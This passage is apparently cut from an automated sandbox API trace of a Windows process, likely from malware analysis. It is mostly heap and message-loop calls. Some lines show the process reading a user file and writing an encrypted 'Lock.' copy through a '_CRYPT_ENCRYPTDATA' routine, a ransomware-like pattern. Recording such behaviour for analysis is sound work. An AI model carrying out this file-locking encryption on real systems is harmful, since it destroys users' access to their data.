wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0222.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0222.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0222.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0222.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0222.983] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/af0Z-.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\af0z-.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0222.983] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.983] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0222.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0222.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0222.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0222.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0222.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0222.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0222.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0222.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0222.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0222.984] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0222.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0222.984] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0222.984] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0222.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0222.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0222.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0222.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0222.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0222.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0222.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0222.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0222.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0222.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x3be0e78 [0222.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.985] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0222.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0e78 | out: hHeap=0x970000) returned 1 [0222.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0222.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0222.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14818 [0222.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0222.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0222.985] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.af0Z-.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.af0z-.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0222.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0222.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0222.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0222.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0222.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0222.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0222.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0222.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0222.987] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0222.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0222.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0222.987] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0222.987] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0222.987] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0222.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0222.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0222.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0222.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0222.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0222.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0222.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0222.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0222.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0222.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0222.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0222.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0222.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0222.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5d020 [0223.032] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0223.032] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04810, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04810*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0223.035] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04810, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04810*, lpNumberOfBytesRead=0x8cf4f8*=0x66f1, lpOverlapped=0x0) returned 1 [0223.036] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04810, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04810*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0223.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0223.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0223.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0223.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0223.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x166f1) returned 0x2f24820 [0223.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5d020 | out: hHeap=0x970000) returned 1 [0223.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0223.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0223.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0223.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0223.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0223.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0223.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0223.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x166f1) returned 0x2e80330 [0223.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24820 | out: hHeap=0x970000) returned 1 [0223.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0223.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0223.046] TranslateMessage (lpMsg=0x8cf708) returned 0 [0223.046] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0223.046] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0223.046] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0223.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0223.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0223.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0223.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0223.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0223.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x166f1) returned 0x2f24820 [0223.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0223.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24820 | out: hHeap=0x970000) returned 1 [0223.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0223.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0223.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0223.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0223.047] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0223.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0223.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0223.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0223.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0223.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0223.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0223.047] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0223.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0223.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0223.047] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0223.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0223.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0223.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0223.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0223.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0223.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0223.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0223.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0223.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x166f1) returned 0x2f24820 [0223.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0223.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0223.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0223.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0223.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fd8 [0223.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0223.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0223.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0223.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f68 [0223.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0223.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0223.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0223.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0223.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0223.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0223.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0223.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0223.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0223.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x166f1) returned 0x2e96a30 [0223.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0223.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0223.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0223.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0223.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0223.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0223.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0223.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0223.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0223.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0223.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0223.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0223.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0223.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0223.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0223.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0223.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0223.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0223.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0223.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0223.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0223.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0223.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0223.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0223.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0223.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0223.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0223.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0223.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0223.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0223.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0223.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0223.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0223.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0223.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0223.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0223.053] HeapFree 